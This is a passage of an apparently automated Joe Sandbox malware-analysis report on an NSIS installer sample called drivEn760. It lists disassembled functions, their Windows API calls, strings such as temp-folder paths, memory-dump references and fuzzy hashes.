                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                            • String ID: "C:\Program Files\Everything\Everything.exe"$C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything$State
                                                                                                            • API String ID: 1941528284-2763679903
                                                                                                            • Opcode ID: 85a3185d7cb92a2e2b40674208c19d5315f45b7b705aed7665b0b79387c8c285
                                                                                                            • Instruction ID: 87dd38174d63fc88252c3cacf76d35d2aef1a13c6195c1d88e2760da23471212
                                                                                                            • Opcode Fuzzy Hash: 85a3185d7cb92a2e2b40674208c19d5315f45b7b705aed7665b0b79387c8c285
                                                                                                            • Instruction Fuzzy Hash: DE41B771500205BACF10BBB5CD85DAE7A75EF45328B20473FF422B21E1D63D89619A2E

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 781 4056ca-4056df 782 4056e5-4056f6 781->782 783 405796-40579a 781->783 784 405701-40570d lstrlenW 782->784 785 4056f8-4056fc call 4066a5 782->785 787 40572a-40572e 784->787 788 40570f-40571f lstrlenW 784->788 785->784 789 405730-405737 SetWindowTextW 787->789 790 40573d-405741 787->790 788->783 791 405721-405725 lstrcatW 788->791 789->790 792 405743-405785 SendMessageW * 3 790->792 793 405787-405789 790->793 791->787 792->793 793->783 794 40578b-40578e 793->794 794->783
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(Delete on reboot: C:\Users\user\AppData\Local\Temp\nss476A.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                                            • lstrlenW.KERNEL32(004030A8,Delete on reboot: C:\Users\user\AppData\Local\Temp\nss476A.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                                            • lstrcatW.KERNEL32(Delete on reboot: C:\Users\user\AppData\Local\Temp\nss476A.tmp\,004030A8,004030A8,Delete on reboot: C:\Users\user\AppData\Local\Temp\nss476A.tmp\,00000000,00000000,00000000), ref: 00405725
                                                                                                            • SetWindowTextW.USER32(Delete on reboot: C:\Users\user\AppData\Local\Temp\nss476A.tmp\,Delete on reboot: C:\Users\user\AppData\Local\Temp\nss476A.tmp\), ref: 00405737
                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                                              • Part of subcall function 004066A5: lstrcatW.KERNEL32(Delete on reboot: ,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                                                              • Part of subcall function 004066A5: lstrlenW.KERNEL32(Delete on reboot: ,00000000,Delete on reboot: C:\Users\user\AppData\Local\Temp\nss476A.tmp\,?,00405701,Delete on reboot: C:\Users\user\AppData\Local\Temp\nss476A.tmp\,00000000), ref: 004068A4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                                                                            • String ID: Delete on reboot: C:\Users\user\AppData\Local\Temp\nss476A.tmp\
                                                                                                            • API String ID: 1495540970-790493214
                                                                                                            • Opcode ID: 0142927bfb998455769cd0419fa09c07e1ff5bc01981d52e0632b3bc7fc58000
                                                                                                            • Instruction ID: 7f52a71d89202be05388d2ae90ba5930d13dcc1e6093ad3ff4eaa481a322a782
                                                                                                            • Opcode Fuzzy Hash: 0142927bfb998455769cd0419fa09c07e1ff5bc01981d52e0632b3bc7fc58000
                                                                                                            • Instruction Fuzzy Hash: C6217A71900518FACB119FA5DD84A8EBFB8EB45360F10857AF904B62A0D67A4A509F68

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 795 4069c5-4069e5 GetSystemDirectoryW 796 4069e7 795->796 797 4069e9-4069eb 795->797 796->797 798 4069fc-4069fe 797->798 799 4069ed-4069f6 797->799 801 4069ff-406a32 wsprintfW LoadLibraryExW 798->801 799->798 800 4069f8-4069fa 799->800 800->801
                                                                                                            APIs
                                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                                                                            • wsprintfW.USER32 ref: 00406A17
                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A2B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                            • String ID: %s%S.dll$UXTHEME$\
                                                                                                            • API String ID: 2200240437-1946221925
                                                                                                            • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                                                                            • Instruction ID: e2ac2e7087162e0187f8b4d6776822ec24d6e31928394cf94a41c199a4feb156
                                                                                                            • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                                                                            • Instruction Fuzzy Hash: 3AF096B154121DA7DB14AB68DD0EF9B366CAB00705F11447EA646F20E0EB7CDA68CB98

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 802 402950-402969 call 402da6 call 405fae 807 402972-40298b call 406133 call 406158 802->807 808 40296b-40296d call 402da6 802->808 814 402991-40299a 807->814 815 402a3b-402a40 807->815 808->807 816 4029a0-4029b7 GlobalAlloc 814->816 817 402a23-402a2b call 403371 814->817 818 402a42-402a4e DeleteFileW 815->818 819 402a55 815->819 816->817 820 4029b9-4029d6 call 4035f8 call 4035e2 GlobalAlloc 816->820 823 402a30-402a35 CloseHandle 817->823 818->819 827 4029d8-4029e0 call 403371 820->827 828 402a0c-402a1f call 40620a GlobalFree 820->828 823->815 831 4029e5 827->831 828->817 833 4029ff-402a01 831->833 834 402a03-402a06 GlobalFree 833->834 835 4029e7-4029fc call 406113 833->835 834->828 835->833
                                                                                                            APIs
                                                                                                            • GlobalAlloc.KERNELBASE(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                                                                            • GlobalFree.KERNEL32(?), ref: 00402A06
                                                                                                            • GlobalFree.KERNELBASE(00000000), ref: 00402A19
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                                                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2667972263-0
                                                                                                            • Opcode ID: 2421e7d21af3a58438b8f2604f73b0c275452346c617808a2d043735fc6309d0
                                                                                                            • Instruction ID: 78b93316678d616cb595922dcd62a83f4062aa2fb33f08fb70827f98fa9650ab
                                                                                                            • Opcode Fuzzy Hash: 2421e7d21af3a58438b8f2604f73b0c275452346c617808a2d043735fc6309d0
                                                                                                            • Instruction Fuzzy Hash: E131B171D00124BBCF216FA9CE89D9EBE79AF09364F10023AF461762E1CB794D429B58

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 838 404e71-404e88 839 404e95-404ea0 838->839 840 404e8a-404e93 838->840 842 404ea2-404ea7 839->842 843 404ea8-404eae 839->843 841 404ee3-404f37 call 4066a5 * 3 lstrlenW wsprintfW SetDlgItemTextW 840->841 842->843 844 404eb0-404eb4 843->844 845 404eb5-404ebb 843->845 844->845 847 404eca-404ee1 845->847 848 404ebd-404ec8 845->848 847->841 848->847
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                                                                            • wsprintfW.USER32 ref: 00404F1B
                                                                                                            • SetDlgItemTextW.USER32(?,00423748), ref: 00404F2E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                                            • String ID: %u.%u%s%s$H7B
                                                                                                            • API String ID: 3540041739-107966168
                                                                                                            • Opcode ID: 0bc8c34827350a1feddb0b043316ab74816edfdf87aa7e679fef7c7e57395ced
                                                                                                            • Instruction ID: 20619224473e8c08b4fba53027c62ddcf1c3fef784a2ba69f514aa474de30786
                                                                                                            • Opcode Fuzzy Hash: 0bc8c34827350a1feddb0b043316ab74816edfdf87aa7e679fef7c7e57395ced
                                                                                                            • Instruction Fuzzy Hash: 1A11D8736041283BDB00A5ADDC45E9F3298AB81338F150637FA26F61D1EA79882182E8

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 854 405b99-405be4 CreateDirectoryW 855 405be6-405be8 854->855 856 405bea-405bf7 GetLastError 854->856 857 405c11-405c13 855->857 856->857 858 405bf9-405c0d SetFileSecurityW 856->858 858->855 859 405c0f GetLastError 858->859 859->857
                                                                                                            APIs
                                                                                                            • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                                                                            • GetLastError.KERNEL32 ref: 00405BF0
                                                                                                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C05
                                                                                                            • GetLastError.KERNEL32 ref: 00405C0F
                                                                                                            Strings
                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BBF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                            • API String ID: 3449924974-823278215
                                                                                                            • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                                                                            • Instruction ID: 886f74eda6482ab63e8fe18d08a652fea41827dc0a526659a7d7b5e138c44e4e
                                                                                                            • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                                                                            • Instruction Fuzzy Hash: 95010871D04219EAEF009FA1CD44BEFBBB8EF14314F04403ADA44B6180E7789648CB99
                                                                                                            APIs
                                                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Timeout
                                                                                                            • String ID: !
                                                                                                            • API String ID: 1777923405-2657877971
                                                                                                            • Opcode ID: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                                                                            • Instruction ID: e1c20d37316975b9b94706f7b3abd8da4b7b3b5136eece5bd2aa3cbae88a6c19
                                                                                                            • Opcode Fuzzy Hash: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                                                                            • Instruction Fuzzy Hash: 28219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 004061A5
                                                                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040363E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 004061C0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CountFileNameTempTick
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                            • API String ID: 1716503409-44229769
                                                                                                            • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                                                                            • Instruction ID: 21b676f9b33da427d45e0b2d6905a63b6509bf3d89a4e990effff8b21c6fdcbe
                                                                                                            • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                                                                            • Instruction Fuzzy Hash: C3F09076700214BFEB008F59DD05E9AB7BCEBA1710F11803AEE05EB180E6B0A9648768
                                                                                                            APIs
                                                                                                            • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C37
                                                                                                            • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C4B
                                                                                                            Strings
                                                                                                            • C:\Users\user\AppData\Local\Temp\nss476A.tmp\, xrefs: 00403C5B
                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nss476A.tmp\
                                                                                                            • API String ID: 2962429428-4167381517
                                                                                                            • Opcode ID: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                                                                            • Instruction ID: ab9e488bef71b432d29da19662b82269d7b8f1628316f3e3d8f7e3aa77a32ace
                                                                                                            • Opcode Fuzzy Hash: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                                                                            • Instruction Fuzzy Hash: 3BE0863244471496E5246F7DAF4D9853B285F413357248726F178F60F0C7389A9B4A9D
                                                                                                            APIs
                                                                                                              • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,75923420,?,75922EE0,00405D94,?,75923420,75922EE0,00000000), ref: 00405FF0
                                                                                                              • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                                                                              • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                                                                            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                              • Part of subcall function 00405B99: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                                                                            • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything,?,00000000,000000F0), ref: 0040164D
                                                                                                            Strings
                                                                                                            • C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything, xrefs: 00401640
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
